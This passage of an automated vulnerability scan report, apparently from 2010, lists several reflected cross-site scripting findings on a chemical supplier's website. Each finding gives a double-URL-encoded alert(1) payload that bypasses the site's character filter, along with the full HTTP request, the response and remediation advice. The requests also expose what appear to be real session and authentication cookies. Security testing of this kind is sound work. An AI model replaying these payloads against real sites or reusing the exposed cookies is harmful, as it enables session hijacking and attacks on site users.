Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:45 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc8977b";alert(1)//9f89e2c44cf/medialib/labware/labware-icons/bottles","E404") ;
   </script>
...[SNIP]...

1.344. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/bottles [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/bottles

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6867%2522%253balert%25281%2529%252f%252ff01418ab3cd was submitted in the REST URL parameter 2. This input was echoed as d6867";alert(1)//f01418ab3cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %2522 (which decodes to %22 and then to ") instead of the " character, as this payload does, or %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will already have carried out one decode; the double-encoded payload evidently passes the character filter because the filter inspects the once-decoded value while the page is built from the twice-decoded one. In any case, the application should canonicalise the value exactly once, perform its input validation on that canonical form, and then encode the value for the JavaScript string context (escaping backslashes, quotation marks and the "</" sequence) before writing it into the script.

Request

GET /etc/medialibd6867%2522%253balert%25281%2529%252f%252ff01418ab3cd/labware/labware-icons/bottles HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:47 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibd6867";alert(1)//f01418ab3cd/labware/labware-icons/bottles","E404") ;
   </script>
...[SNIP]...

1.345. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/bottles [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/bottles

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab648%2522%253balert%25281%2529%252f%252f0f1de7efb91 was submitted in the REST URL parameter 3. This input was echoed as ab648";alert(1)//0f1de7efb91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %2522 (which decodes to %22 and then to ") instead of the " character, as this payload does, or %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3, as the web server will already have carried out one decode; the double-encoded payload evidently passes the character filter because the filter inspects the once-decoded value while the page is built from the twice-decoded one. In any case, the application should canonicalise the value exactly once, perform its input validation on that canonical form, and then encode the value for the JavaScript string context (escaping backslashes, quotation marks and the "</" sequence) before writing it into the script.

Request

GET /etc/medialib/labwareab648%2522%253balert%25281%2529%252f%252f0f1de7efb91/labware-icons/bottles HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:49 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labwareab648";alert(1)//0f1de7efb91/labware-icons/bottles","E404") ;
   </script>
...[SNIP]...

1.346. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/bottles [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/bottles

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47470%2522%253balert%25281%2529%252f%252faec1e8d6636 was submitted in the REST URL parameter 4. This input was echoed as 47470";alert(1)//aec1e8d6636 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %2522 (which decodes to %22 and then to ") instead of the " character, as this payload does, or %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4, as the web server will already have carried out one decode; the double-encoded payload evidently passes the character filter because the filter inspects the once-decoded value while the page is built from the twice-decoded one. In any case, the application should canonicalise the value exactly once, perform its input validation on that canonical form, and then encode the value for the JavaScript string context (escaping backslashes, quotation marks and the "</" sequence) before writing it into the script.

Request

GET /etc/medialib/labware/labware-icons47470%2522%253balert%25281%2529%252f%252faec1e8d6636/bottles HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:51 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons47470";alert(1)//aec1e8d6636/bottles","E404") ;
   </script>
...[SNIP]...

1.347. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/bottles [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/bottles

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e058%2522%253balert%25281%2529%252f%252f243d8772e was submitted in the REST URL parameter 5. This input was echoed as 9e058";alert(1)//243d8772e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons/bottles9e058%2522%253balert%25281%2529%252f%252f243d8772e HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:53 GMT
Content-Length: 28944
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/bottles9e058";alert(1)//243d8772e","E404") ;
   </script>
...[SNIP]...

1.348. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/cell-culture [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/cell-culture

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 694f6%2522%253balert%25281%2529%252f%252f3ccebd517b4 was submitted in the REST URL parameter 1. This input was echoed as 694f6";alert(1)//3ccebd517b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc694f6%2522%253balert%25281%2529%252f%252f3ccebd517b4/medialib/labware/labware-icons/cell-culture HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
